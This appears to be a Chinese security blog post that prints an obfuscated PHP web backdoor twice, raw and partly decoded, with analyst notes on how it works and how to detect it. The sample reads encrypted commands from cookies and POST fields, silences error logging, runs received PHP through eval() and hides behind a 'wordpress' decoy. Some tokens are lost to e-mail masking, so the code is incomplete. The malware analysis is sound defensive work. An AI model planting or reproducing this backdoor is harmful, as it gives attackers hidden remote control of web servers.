一段加密的后门代码
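代码解密结果见:https://malwaredecoder.com/result/fc0d676e44b62985879f8f61a598df7a
下面是一段经过混淆的 PHP 后门代码。变量名和字符串都用十六进制转义书写,并通过 $GLOBALS 间接引用;代码中出现的 “[email protected]” 是网页邮箱保护功能留下的转码残留,不是原始代码,被替换掉的原始字符已无法从本页还原: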
<?php ${"\x47\x4c\x4fB\x41LS"}["s\x70\x72\x62\x77l\x6fi"]="\x6f\x75t_\x64\x61\x74\x61";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["w\x64k\x71e\x67\x62t\x73"]="\x6b\x65\x79\x33";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x72\x65\x64\x73ob\x64\x67\x66\x77"]="\x6b\x65\x79\x32";${"\x47L\x4f\x42\x41\x4c\x53"}["\x63x\x76t\x73\x72\x63\x77r"]="\x6e";${"G\x4c\x4fBAL\x53"}["ud\x77\x77\x78e\x69\x6e\x6as"]="c";${"G\x4c\x4fB\x41\x4c\x53"}["ct\x78\x67\x76qg\x6cvo\x67"]="\x70";${"G\x4c\x4f\x42\x41\x4c\x53"}["\x73j\x68y\x77\x6e\x68"]="\x73";${"\x47L\x4f\x42ALS"}["\x72d\x68ii\x76\x67\x72\x6d"]="\x62a\x73\x656\x34\x69\x6ev";${"\x47\x4cO\x42\x41\x4cS"}["\x6f\x69\x6d\x66\x77p\x62v\x73"]="i";${"\x47\x4cO\x42\x41\x4cS"}["\x78\x65\x66ud\x77\x65\x6b\x71\x78\x72"]="b\x61s\x65\x36\x34\x63\x68\x61r\x73";${"\x47LO\x42\x41LS"}["\x6a\x6boz\x74\x6f\x67\x6b"]="\x64";${"\x47\x4c\x4f\x42\x41LS"}["\x6a\x66du\x62\x66\x73y"]="\x61";${"G\x4c\x4f\x42AL\x53"}["\x70\x70\x6d\x75\x79\x76i"]="\x72";${"\x47L\x4f\x42A\x4c\x53"}["\x66km\x79\x71\x65\x78"]="\x61\x6b";${"\x47LOB\x41\x4cS"}["\x6e\x76\x69\x71\x70\x68\x6c"]="da\x74\x61";${"\x47\x4c\x4f\x42\x41LS"}["q\x6c\x79\x6d\x6f\x6b\x66zoe"]="key";@ini_set("\x65\x72\x72\x6f\x72_l\x6fg",NULL);@ini_set("\x6c\x6fg\x5f\x65rr\x6fr\x73",0);@ini_set("\x6d\x61\x78_\x65x\x65\x63u\x74\x69\x6f\x6e_\x74\x69m\x65",0);@set_time_limit(0);array_walk($_COOKIE,"e\x6eu\x6d\x65r\x61\x74o\x72");array_walk($_POST,"\x65nu\x6d\x65rator");function enumerator($value,$key){${"\x47\x4cOB\x41\x4c\x53"}["\x77b\x6e\x72\x64\x66"]="d\x61ta";${"\x47\x4c\x4f\x42A\x4c\x53"}["x\x76\x73\x77\x6d\x74\x76\x79o\x64"]="\x76a\x6c\x75e";${${"G\x4c\x4f\x42A\x4c\x53"}["w\x62\x6erd\x66"]}[email 
protected](decode(get_params(${${"GLO\x42AL\x53"}["\x78\x76\x73\x77\x6d\x74\x76\x79od"]}),${${"G\x4cO\x42A\x4cS"}["q\x6c\x79mok\x66\x7ao\x65"]}));@extract(${${"\x47L\x4fBA\x4c\x53"}["\x6e\x76i\x71\x70\x68\x6c"]});if(isset(${${"GL\x4f\x42\x41LS"}["\x66\x6b\x6d\x79\x71\x65\x78"]})){${"G\x4c\x4f\x42A\x4c\x53"}["\x6bd\x63cuu\x74\x6a\x63cpn"]="\x72";${${"\x47L\x4f\x42\x41\x4c\x53"}["\x6bd\x63\x63\x75\x75\x74\x6a\x63\x63p\x6e"]}=array();${"G\x4c\x4f\x42\x41\x4c\x53"}["\x6a\x6b\x62\x6c\x61l\x69"]="\x61";$dnyyrqcjhbg="\x72";${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x70\x70\x6d\x75\x79v\x69"]}["\x73".chr(118)]=chr(49).".\x30-3";$kwshfzxow="\x72";${$dnyyrqcjhbg}["p".chr(118)]=PHP_VERSION;if(ord(${${"GL\x4f\x42\x41\x4cS"}["\x6a\x66d\x75\x62\x66\x73\x79"]})==105)[email protected](${$kwshfzxow});elseif(ord(${${"G\x4c\x4f\x42\x41\x4c\x53"}["j\x6b\x62l\x61\x6c\x69"]})==101)eval(${${"\x47\x4cO\x42A\x4c\x53"}["j\x6b\x6f\x7a\x74\x6f\x67\x6b"]});exit();}}function get_params($s){$egmozpvqw="c";$dvhtoerid="ba\x73\x65\x36\x34\x63ha\x72\x73";${"\x47\x4cOB\x41L\x53"}["\x69\x61\x6b\x74\x61\x65p\x7a\x6bolt"]="\x73";${${"\x47LO\x42\x41\x4cS"}["\x78e\x66u\x64\x77e\x6b\x71\x78r"]}="\x41B\x43\x44\x45FG\x48I\x4aKLMN\x4f\x50\x51\x52S\x54\x55V\x57X\x59Z\x61\x62\x63\x64ef\x67\x68i\x6akl\x6d\x6eop\x71\x72s\x74u\x76w\x78y\x7a012\x334\x356\x3789+/";${"\x47L\x4f\x42A\x4c\x53"}["\x75\x64\x67m\x6ft\x6cl\x72\x71q\x79"]="r";$navmbtcm="\x70";$hbzvyvtkwl="\x70";$lksboqor="\x73";${"\x47\x4c\x4f\x42A\x4cS"}["\x6ecd\x67q\x72\x75\x73\x6fdb"]="\x62a\x73e\x364\x69\x6e\x76";$pjitegq="\x73";${${"\x47L\x4f\x42A\x4c\x53"}["\x6e\x63\x64\x67q\x72u\x73od\x62"]}=Array();${"G\x4c\x4f\x42\x41\x4cS"}["\x61\x68\x72\x63d\x68\x6blj\x63h\x66"]="s";${"\x47\x4c\x4f\x42\x41LS"}["\x73\x77\x7a\x6ad\x6dme\x6b"]="r";for(${${"\x47L\x4f\x42\x41\x4c\x53"}["\x6fi\x6dfwpb\x76\x73"]}=0;${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x6f\x69\x6df\x77\x70bvs"]}<strlen(${$dvhtoerid});${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x6f\x69\x6d\x66\x77\x70b\x76\x73"]}++){${${"\x4
7L\x4f\x42\x41\x4c\x53"}["\x72\x64h\x69i\x76g\x72\x6d"]}[${${"G\x4cOB\x41L\x53"}["\x78\x65\x66\x75d\x77\x65\x6b\x71\x78\x72"]}[${${"\x47LO\x42\x41\x4c\x53"}["\x6f\x69\x6dfw\x70\x62v\x73"]}]]=${${"\x47\x4c\x4f\x42AL\x53"}["o\x69\x6d\x66\x77p\x62v\x73"]};}${${"G\x4c\x4fB\x41\x4c\x53"}["s\x6a\x68y\x77\x6e\x68"]}=preg_replace("~[^A-\x5a\x61-z\x30-\x39\x5c+\x5c/\x5c=]\x7e","",${$lksboqor});${$hbzvyvtkwl}=${${"G\x4c\x4f\x42A\x4c\x53"}["\x73j\x68ywn\x68"]}[strlen(${${"G\x4c\x4f\x42\x41\x4cS"}["a\x68r\x63\x64h\x6b\x6cj\x63h\x66"]})-1]=="\x3d"?(${${"\x47\x4c\x4f\x42A\x4cS"}["\x73\x6ah\x79\x77\x6e\x68"]}[strlen(${${"G\x4cOB\x41L\x53"}["\x73\x6ahy\x77n\x68"]})-2]=="="?"AA":"\x41"):"";${"GL\x4f\x42A\x4cS"}["\x6ai\x68\x6bu\x6d\x79\x72\x6eq\x63"]="\x72";${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x75\x64\x67\x6d\x6ft\x6c\x6cr\x71\x71\x79"]}="";${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x73\x6ah\x79\x77\x6eh"]}=substr(${$pjitegq},0,strlen(${${"GL\x4f\x42\x41\x4cS"}["\x69\x61\x6b\x74\x61\x65\x70\x7a\x6bo\x6ct"]})-strlen(${$navmbtcm})).${${"GL\x4f\x42\x41\x4c\x53"}["\x63t\x78g\x76\x71gl\x76o\x67"]};for(${$egmozpvqw}=0;${${"\x47\x4cOB\x41\x4c\x53"}["\x75\x64\x77wx\x65\x69\x6ejs"]}<strlen(${${"\x47\x4cOBA\x4c\x53"}["s\x6a\x68\x79\x77nh"]});${${"\x47LO\x42\x41L\x53"}["\x75\x64\x77w\x78\x65\x69\x6ej\x73"]}+=4){${"\x47\x4cO\x42ALS"}["\x6a\x77in\x71\x6dw\x62\x63"]="s";${"\x47\x4c\x4f\x42\x41L\x53"}["\x61\x6ee\x64\x71\x65\x79\x76\x62"]="\x6e";$pwqkwj="\x62\x61se\x36\x34i\x6e\x76";$fyojtix="n";$gkrhxxtopl="s";${"GL\x4fB\x41\x4c\x53"}["\x74mv\x6a\x68k\x6c\x64"]="s";${"\x47\x4cO\x42\x41L\x53"}["a\x7a\x73o\x6f\x68\x78n\x75wz\x76"]="c";${"G\x4cOB\x41\x4c\x53"}["\x74\x6al\x75\x6c\x61\x76\x69\x67\x64"]="n";${${"GL\x4f\x42\x41\x4c\x53"}["c\x78\x76t\x73\x72\x63\x77\x72"]}=(${${"\x47\x4c\x4fBA\x4cS"}["\x72\x64\x68iiv\x67\x72\x6d"]}[${${"G\x4c\x4fB\x41LS"}["\x73\x6ah\x79\x77nh"]}[${${"\x47\x4c\x4f\x42AL\x53"}["\x61\x7a\x73o\x6fh\x78\x6e\x75\x77\x7av"]}]]<<18)+(${${"\x47\x4c\x4fB\x41LS"}["\x72\x64h\x69\x69v\x67\x72
\x6d"]}[${${"\x47L\x4fBA\x4cS"}["j\x77\x69\x6e\x71\x6d\x77\x62\x63"]}[${${"G\x4c\x4f\x42A\x4cS"}["\x75\x64w\x77x\x65i\x6e\x6as"]}+1]]<<12)+(${${"GLO\x42\x41L\x53"}["r\x64\x68i\x69v\x67rm"]}[${$gkrhxxtopl}[${${"\x47\x4cOB\x41L\x53"}["ud\x77\x77xe\x69n\x6as"]}+2]]<<6)+${$pwqkwj}[${${"G\x4c\x4fB\x41\x4c\x53"}["\x74m\x76\x6a\x68\x6bld"]}[${${"\x47\x4cO\x42\x41L\x53"}["u\x64\x77w\x78ei\x6ejs"]}+3]];${${"\x47\x4c\x4fB\x41\x4c\x53"}["p\x70m\x75\x79\x76\x69"]}.=chr((${${"\x47\x4cO\x42A\x4c\x53"}["\x74\x6a\x6cu\x6c\x61\x76\x69\x67d"]}>>16)&255).chr((${${"\x47\x4cOBA\x4c\x53"}["a\x6ee\x64q\x65\x79\x76\x62"]}>>8)&255).chr(${$fyojtix}&255);}return substr(${${"\x47L\x4fBAL\x53"}["\x73\x77z\x6a\x64m\x6dek"]},0,strlen(${${"\x47\x4cO\x42\x41\x4cS"}["\x6a\x69\x68\x6b\x75\x6dy\x72\x6e\x71\x63"]})-strlen(${${"\x47LOB\x41LS"}["\x63\x74\x78\x67vq\x67l\x76\x6fg"]}));}function decode($data,$key){${"\x47L\x4f\x42ALS"}["n\x7a\x78z\x78\x68d\x75i\x77\x66"]="\x69";${"GLO\x42\x41L\x53"}["\x78i\x71\x77\x62\x64k\x77"]="\x6be\x79\x33";${"\x47\x4cOB\x41L\x53"}["h\x78\x6e\x74\x73\x6d"]="\x64\x61\x74a";$nfcrlzoqiyym="\x69";$ofbkzgrupiv="\x6fu\x74\x5fda\x74a";${"GLOB\x41\x4c\x53"}["ei\x61l\x75\x74\x75"]="\x69";${${"\x47L\x4fB\x41\x4cS"}["r\x65d\x73\x6fb\x64g\x66w"]}="0\x38ae\x381a2-\x6545\x31-4\x63\x39\x38-88c\x65-9d2\x32562\x66\x30\x61\x630";${"G\x4c\x4fB\x41L\x53"}["nm\x74ku\x6b\x64\x65"]="\x6f\x75t\x5fda\x74\x61";$eykvvkxfgb="\x69";$hlrlfgf="\x6be\x79";${${"\x47\x4c\x4fBA\x4cS"}["\x77\x64\x6b\x71\x65\x67\x62t\x73"]}=pack("\x48*","0\x34\x35d07\x35\x33\x30\x62\x350\x3035\x3700\x354\x35\x35\x35\x37\x35\x35\x30\x300\x305\x36\x35\x380e\x30\x30\x30\x31\x309500\x31\x3000\x66\x30\x32\x350\x30b\x30\x630\x30\x30\x3751\x3555\x33\x357\x35\x32");${$ofbkzgrupiv}="";${"GL\x4fBA\x4c\x53"}["o\x67y\x63\x73\x66\x71\x70q"]="key\x33";for(${$nfcrlzoqiyym}=0;${${"G\x4c\x4fBA\x4cS"}["n\x7ax\x7ax\x68\x64u\x69\x77\x66"]}<strlen(${${"\x47\x4cO\x42\x41L\x53"}["\x6e\x76\x69\x71\x70hl"]});${${"\x47\x4cOB\x41L\x53"}["\x6f\x69\x6
d\x66\x77\x70\x62\x76\x73"]}++)${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x73p\x72b\x77\x6c\x6f\x69"]}.=${${"\x47L\x4f\x42A\x4c\x53"}["\x68x\x6et\x73\x6d"]}[${$eykvvkxfgb}]^${$hlrlfgf}[${${"\x47L\x4f\x42\x41LS"}["\x6fi\x6df\x77\x70\x62v\x73"]}%strlen(${${"\x47\x4cO\x42\x41\x4cS"}["\x71\x6c\x79\x6d\x6f\x6b\x66\x7ao\x65"]})]^${${"\x47\x4cOB\x41L\x53"}["\x72\x65d\x73o\x62\x64\x67\x66\x77"]}[${${"GLOB\x41\x4c\x53"}["ei\x61l\x75\x74u"]}%strlen(${${"\x47\x4cO\x42\x41LS"}["\x72\x65\x64s\x6f\x62\x64\x67\x66w"]})]^${${"GL\x4f\x42\x41\x4c\x53"}["\x6f\x67\x79\x63\x73f\x71\x70q"]}[${${"\x47\x4cO\x42A\x4cS"}["oi\x6df\x77\x70\x62\x76\x73"]}%strlen(${${"\x47\x4c\x4fB\x41\x4cS"}["\x78i\x71\x77\x62\x64\x6bw"]})];return${${"\x47\x4c\x4f\x42A\x4c\x53"}["n\x6d\x74k\x75\x6b\x64\x65"]};}
?><pre align=center><form>wordpress</form></pre>
去混淆后的代码(只还原了十六进制转义,变量仍然通过 $GLOBALS 间接引用):
/*
 * Analyst notes on the decoded sample (PHP web backdoor), written for triage and detection.
 *
 * Listing caveats
 *  - Every "[email protected]" below is an artifact of the hosting page's e-mail masking, not
 *    original code. The tokens it replaced are lost, so the listing does not parse as shown.
 *  - The obfuscated original on this page calls exit() at the end of the isset($ak) branch;
 *    this decoded listing omits that call.
 *  - Only the hex escapes were decoded. Names are still resolved through
 *    ${"GLOBALS"}["<random key>"] lookups that yield plain names such as data, key, key2,
 *    key3, out_data, base64chars, base64inv, s, p, r, n, c, i, a, d and ak.
 *
 * Set-up (top-level statements)
 *  - error_log is cleared, log_errors is set to 0 and the execution time limit is removed,
 *    with every call silenced by @, so failures leave no trace in the PHP error log.
 *  - array_walk() hands every $_COOKIE entry and every $_POST entry to enumerator(), so each
 *    request field is tried as a possible command carrier.
 *
 * enumerator($value, $key)
 *  - $value is the field content and $key the field name (array_walk callback arguments).
 *  - The content goes through get_params(), then decode() keyed by the field name, then a
 *    masked call whose result is stored in $data. @extract($data) follows, so that call
 *    presumably returns an array - confirm against an unmasked copy of the sample.
 *  - @extract() turns the decoded entries into local variables; $ak, $a and $d are read.
 *  - Nothing happens unless $ak is set. If it is set, $r is filled with the marker
 *    sv = "1.0-3" and pv = PHP_VERSION; when the first byte of $a is 105 ('i'), $r is passed
 *    to a masked call; when it is 101 ('e'), the contents of $d are run through eval().
 *
 * get_params($s)
 *  - A hand-written base64 decoder: it builds an inverse table from the standard alphabet,
 *    strips characters outside [A-Za-z0-9+/=], replaces '=' padding with 'A' characters,
 *    decodes four characters into three bytes and trims the padding bytes from the result.
 *  - Presumably written by hand so that no literal base64_decode() call appears in the file.
 *
 * decode($data, $key)
 *  - Byte-wise XOR of $data with three repeating keys: $key (the request field name), the
 *    hard-coded string assigned to key2, and the bytes produced by pack("H*", ...) for key3.
 *
 * Detection and response pointers
 *  - File content: ${"GLOBALS"}[...] variable-variable chains (hex-escaped in the raw file),
 *    array_walk() over $_COOKIE/$_POST with a string callback, @extract() on decoded request
 *    data, eval(), @ini_set("error_log", NULL), the hard-coded key2 string, and the trailing
 *    decoy markup "<pre align=center><form>wordpress</form></pre>".
 *  - Traffic: requests whose cookie or POST values are long base64 strings, sent to a PHP
 *    file that otherwise renders only the decoy markup.
 *  - The eval() branch runs arbitrary PHP, so a host carrying this file should be handled as
 *    fully compromised: look for further dropped files and rotate credentials the web
 *    server could read.
 */
${"GLOBALS"}["sprbwloi"]="out_data";${"GLOBALS"}["wdkqegbts"]="key3";${"GLOBALS"}["redsobdgfw"]="key2";${"GLOBALS"}["cxvtsrcwr"]="n";${"GLOBALS"}["udwwxeinjs"]="c";${"GLOBALS"}["ctxgvqglvog"]="p";${"GLOBALS"}["sjhywnh"]="s";${"GLOBALS"}["rdhiivgrm"]="base64inv";${"GLOBALS"}["oimfwpbvs"]="i";${"GLOBALS"}["xefudwekqxr"]="base64chars";${"GLOBALS"}["jkoztogk"]="d";${"GLOBALS"}["jfdubfsy"]="a";${"GLOBALS"}["ppmuyvi"]="r";${"GLOBALS"}["fkmyqex"]="ak";${"GLOBALS"}["nviqphl"]="data";${"GLOBALS"}["qlymokfzoe"]="key";@ini_set("error_log",NULL);@ini_set("log_errors",0);@ini_set("max_execution_time",0);@set_time_limit(0);array_walk($_COOKIE,"enumerator");array_walk($_POST,"enumerator");function enumerator($value,$key){${"GLOBALS"}["wbnrdf"]="data";${"GLOBALS"}["xvswmtvyod"]="value";${${"GLOBALS"}["wbnrdf"]}[email protected](decode(get_params(${${"GLOBALS"}["xvswmtvyod"]}),${${"GLOBALS"}["qlymokfzoe"]}));@extract(${${"GLOBALS"}["nviqphl"]});if(isset(${${"GLOBALS"}["fkmyqex"]})){${"GLOBALS"}["kdccuutjccpn"]="r";${${"GLOBALS"}["kdccuutjccpn"]}=array();${"GLOBALS"}["jkblali"]="a";$dnyyrqcjhbg="r";${${"GLOBALS"}["ppmuyvi"]}["sv"]="1.0-3";$kwshfzxow="r";${$dnyyrqcjhbg}["pv"]=PHP_VERSION;if(ord(${${"GLOBALS"}["jfdubfsy"]})==105)[email protected](${$kwshfzxow});elseif(ord(${${"GLOBALS"}["jkblali"]})==101)eval(${${"GLOBALS"}["jkoztogk"]});}}function 
get_params($s){$egmozpvqw="c";$dvhtoerid="base64chars";${"GLOBALS"}["iaktaepzkolt"]="s";${${"GLOBALS"}["xefudwekqxr"]}="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";${"GLOBALS"}["udgmotllrqqy"]="r";$navmbtcm="p";$hbzvyvtkwl="p";$lksboqor="s";${"GLOBALS"}["ncdgqrusodb"]="base64inv";$pjitegq="s";${${"GLOBALS"}["ncdgqrusodb"]}=Array();${"GLOBALS"}["ahrcdhkljchf"]="s";${"GLOBALS"}["swzjdmmek"]="r";for(${${"GLOBALS"}["oimfwpbvs"]}=0;${${"GLOBALS"}["oimfwpbvs"]}<strlen(${$dvhtoerid});${${"GLOBALS"}["oimfwpbvs"]}++){${${"GLOBALS"}["rdhiivgrm"]}[${${"GLOBALS"}["xefudwekqxr"]}[${${"GLOBALS"}["oimfwpbvs"]}]]=${${"GLOBALS"}["oimfwpbvs"]};}${${"GLOBALS"}["sjhywnh"]}=preg_replace("~[^A-Za-z0-9\+\/\=]~","",${$lksboqor});${$hbzvyvtkwl}=${${"GLOBALS"}["sjhywnh"]}[strlen(${${"GLOBALS"}["ahrcdhkljchf"]})-1]=="="?(${${"GLOBALS"}["sjhywnh"]}[strlen(${${"GLOBALS"}["sjhywnh"]})-2]=="="?"AA":"A"):"";${"GLOBALS"}["jihkumyrnqc"]="r";${${"GLOBALS"}["udgmotllrqqy"]}="";${${"GLOBALS"}["sjhywnh"]}=substr(${$pjitegq},0,strlen(${${"GLOBALS"}["iaktaepzkolt"]})-strlen(${$navmbtcm})).${${"GLOBALS"}["ctxgvqglvog"]};for(${$egmozpvqw}=0;${${"GLOBALS"}["udwwxeinjs"]}<strlen(${${"GLOBALS"}["sjhywnh"]});${${"GLOBALS"}["udwwxeinjs"]}+=4){${"GLOBALS"}["jwinqmwbc"]="s";${"GLOBALS"}["anedqeyvb"]="n";$pwqkwj="base64inv";$fyojtix="n";$gkrhxxtopl="s";${"GLOBALS"}["tmvjhkld"]="s";${"GLOBALS"}["azsoohxnuwzv"]="c";${"GLOBALS"}["tjlulavigd"]="n";${${"GLOBALS"}["cxvtsrcwr"]}=(${${"GLOBALS"}["rdhiivgrm"]}[${${"GLOBALS"}["sjhywnh"]}[${${"GLOBALS"}["azsoohxnuwzv"]}]]<<18)+(${${"GLOBALS"}["rdhiivgrm"]}[${${"GLOBALS"}["jwinqmwbc"]}[${${"GLOBALS"}["udwwxeinjs"]}+1]]<<12)+(${${"GLOBALS"}["rdhiivgrm"]}[${$gkrhxxtopl}[${${"GLOBALS"}["udwwxeinjs"]}+2]]<<6)+${$pwqkwj}[${${"GLOBALS"}["tmvjhkld"]}[${${"GLOBALS"}["udwwxeinjs"]}+3]];${${"GLOBALS"}["ppmuyvi"]}.=chr((${${"GLOBALS"}["tjlulavigd"]}>>16)&255).chr((${${"GLOBALS"}["anedqeyvb"]}>>8)&255).chr(${$fyojtix}&255);}return 
substr(${${"GLOBALS"}["swzjdmmek"]},0,strlen(${${"GLOBALS"}["jihkumyrnqc"]})-strlen(${${"GLOBALS"}["ctxgvqglvog"]}));}function decode($data,$key){${"GLOBALS"}["nzxzxhduiwf"]="i";${"GLOBALS"}["xiqwbdkw"]="key3";${"GLOBALS"}["hxntsm"]="data";$nfcrlzoqiyym="i";$ofbkzgrupiv="out_data";${"GLOBALS"}["eialutu"]="i";${${"GLOBALS"}["redsobdgfw"]}="08ae81a2-e451-4c98-88ce-9d22562f0ac0";${"GLOBALS"}["nmtkukde"]="out_data";$eykvvkxfgb="i";$hlrlfgf="key";${${"GLOBALS"}["wdkqegbts"]}=pack("H*","045d07530b5003570054555755000056580e0001095001000f02500b0c00075155535752");${$ofbkzgrupiv}="";${"GLOBALS"}["ogycsfqpq"]="key3";for(${$nfcrlzoqiyym}=0;${${"GLOBALS"}["nzxzxhduiwf"]}<strlen(${${"GLOBALS"}["nviqphl"]});${${"GLOBALS"}["oimfwpbvs"]}++)${${"GLOBALS"}["sprbwloi"]}.=${${"GLOBALS"}["hxntsm"]}[${$eykvvkxfgb}]^${$hlrlfgf}[${${"GLOBALS"}["oimfwpbvs"]}%strlen(${${"GLOBALS"}["qlymokfzoe"]})]^${${"GLOBALS"}["redsobdgfw"]}[${${"GLOBALS"}["eialutu"]}%strlen(${${"GLOBALS"}["redsobdgfw"]})]^${${"GLOBALS"}["ogycsfqpq"]}[${${"GLOBALS"}["oimfwpbvs"]}%strlen(${${"GLOBALS"}["xiqwbdkw"]})];return${${"GLOBALS"}["nmtkukde"]};}<pre align=center><form>wordpress</form></pre>